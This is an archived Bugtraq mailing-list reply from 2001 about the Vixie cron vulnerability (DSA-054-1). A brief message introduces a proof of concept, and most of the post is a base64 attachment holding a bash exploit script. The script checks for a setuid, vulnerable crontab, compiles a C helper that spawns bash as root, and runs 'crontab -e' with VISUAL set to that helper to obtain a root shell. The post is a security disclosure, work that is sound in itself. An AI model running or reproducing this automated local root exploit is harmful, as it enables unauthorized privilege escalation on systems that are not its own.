[20576] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post
Re: Vixie cron vulnerability

daemon@ATHENA.MIT.EDU (Michal Zalewski)
Tue May 8 18:25:33 2001

MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-373265275-503631084-989335855=:8683"
Message-ID:  <Pine.LNX.4.21.0105081128140.8683-200000@nimue.bos.bindview.com>
Date:         Tue, 8 May 2001 11:30:55 -0400
Reply-To: Michal Zalewski <lcamtuf@COREDUMP.CX>
From: Michal Zalewski <lcamtuf@COREDUMP.CX>
X-To:         Cade Cairns <cairnsc@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.GSO.4.30.0105071548070.19779-300000@mail>

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

---373265275-503631084-989335855=:8683
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Mon, 7 May 2001, Cade Cairns wrote:

> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.

Hm, there is my original proof-of-concept I coded for Sebastian Krahmer
(who discovered this vulnerability), while working on it. This
vulnerability affects Debian, SuSE, and probably few other Linuxes as
well. It is a perfect example of bad coding, and how improper fixing of
bugs might lead to even more dangerous conditions. It is fully automated,
and I believe it gives absolutely nothing to the attacker, as this
vulnerability can be exploited by hand in approximately 5 seconds ;)

Michal Zalewski
http://lcamtuf.coredump.cx

---373265275-503631084-989335855=:8683
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=corntab
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0105081130550.8683@nimue.bos.bindview.com>
Content-Description:
Content-Disposition: attachment; filename=corntab

IyEvYmluL2Jhc2gNCg0KY2xlYXINCmVjaG8gIi4tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS4i
DQplY2hvICJ8IE1hcmNoZXcuSHlwZXJyZWFsIHByZXNlbnRzOiB2aXhpZSBj
cm9udGFiIGV4cGxvaXQgIzcyODM3MSB8Ig0KZWNobyAifD09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09fCINCmVjaG8gInwgU2ViYXN0aWFuIEtyYWhtZXIgPGtyYWhtZXJAc2Vj
dXJpdHkuaXM+ICAgICAgICAgICAgICAgICAgIHwiDQplY2hvICJ8IE1pY2hh
bCBaYWxld3NraSA8bGNhbXR1ZkBjb3JlZHVtcC5jeD4gICAgICAgICAgICAg
ICAgICAgICB8Ig0KZWNobyAiXGAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSciDQplY2hvDQoN
CnRlc3QgIiRDUk9OQklOIiA9ICIiICYmIENST05CSU49L3Vzci9iaW4vY3Jv
bnRhYg0KDQplY2hvICAgICI+Pj4gVXNpbmcgYmluYXJ5OiAgJENST05CSU4i
DQplY2hvIC1uICI+Pj4gU2V0dWlkIGNoZWNrOiAgIg0KDQppZiBbIC11ICRD
Uk9OQklOIF07IHRoZW4NCiAgZWNobyAiUEFTU0VEIg0KZWxzZQ0KICBlY2hv
ICJGQUlMRUQiDQogIGVjaG8NCiAgZXhpdCAxDQpmaQ0KDQplY2hvIC1uICI+
Pj4gVmVyc2lvbiBjaGVjazogIg0KDQpRUT1gc3RyaW5ncyAkQ1JPTkJJTiB8
IGdyZXAgJzQzIHZpeGllIEV4cCdgDQoNCmlmIFsgIiRRUSIgPSAiIiBdOyB0
aGVuDQogIGVjaG8gIkZBSUxFRCINCiAgZWNobw0KICBleGl0IDENCmVsc2UN
CiAgZWNobyAiUEFTU0VEIg0KZmkNCg0KZWNobyAiPj4+IEJ1aWxkaW5nIGV4
cGxvaXQuLi4iDQoNCmNhdCA+ZWRpdDByLmMgPDxfZW9mXw0KI2luY2x1ZGUg
PHN0ZGlvLmg+DQppbnQgbWFpbihpbnQgYXJnYyxjaGFyKiBhcmd2W10pIHsN
CiAgc2xlZXAoMSk7DQogIGlmIChnZXRldWlkKCkpIHsNCiAgICBGSUxFKiB4
PWZvcGVuKGFyZ3ZbMV0sInciKTsNCiAgICBmcHJpbnRmKHgsImJsYWggYmxh
aCBibGFoXG4iKTsNCiAgICBmY2xvc2UoeCk7DQogIH0gZWxzZSB7IA0KICAg
IGR1cDIoMSwwKTsgDQogICAgZHVwMigxLDIpOw0KICAgIHByaW50ZigiXG4+
Pj4gRW50ZXJpbmcgcm9vdHNoZWxsLCBiYWJlLi4uXG4iKTsgDQogICAgc3lz
dGVtKCJ0b3VjaCAkSE9NRS8ueHBsb2l0ZWQiKTsNCiAgICBzeXN0ZW0oImJh
c2giKTsgDQogIH0NCn0NCl9lb2ZfDQoNCmdjYyBlZGl0MHIuYyAtbyBlZGl0
MHIgJj4vZGV2L251bGwNCnJtIC1mIGVkaXQwci5jDQoNCmlmIFsgISAtZiBl
ZGl0MHIgXTsgdGhlbg0KICBlY2hvICI+Pj4gQ2Fubm90IGNvbXBpbGUgZXhw
bG9pdC4iDQogIGVjaG8NCiAgZXhpdCAxDQpmaQ0KDQpybSAtZiB+Ly54cGxv
aXRlZA0KDQplY2hvICI+Pj4gUGVyZm9ybWluZyBhdHRhY2suLi4iDQoNCigg
ZWNobyAieSI7IGVjaG8gIm4iICkgfCBWSVNVQUw9JFBXRC9lZGl0MHIgJENS
T05CSU4gLWUgMj4vZGV2L251bGwNCg0Kcm0gLWYgZWRpdDByDQoNCmlmIFsg
LWYgfi8ueHBsb2l0ZWQgXTsgdGhlbg0KICBlY2hvDQogIGVjaG8gIj4+PiBU
aGFuayB5b3UuIg0KICBybSAtZiB+Ly54cGxvaXRlZA0KICBlY2hvDQogIGV4
aXQgMA0KZWxzZQ0KICBlY2hvDQogIGVjaG8gIj4+PiBBcHBhcmVudGx5IEkg
YW0gbm90IGFibGUgdG8gZXhwbG9pdCBpdCwgc29ycnkuLi4iDQogIGVjaG8N
CiAgZXhpdCAxDQpmaQ0KDQoNCg==
---373265275-503631084-989335855=:8683--

home	help	back	first	fref	pref	prev	next	nref	lref	last	post
[20576] in bugtraq

Re: Vixie cron vulnerability

daemon@ATHENA.MIT.EDU (Michal Zalewski)Tue May 8 18:25:33 2001

daemon@ATHENA.MIT.EDU (Michal Zalewski)
Tue May 8 18:25:33 2001
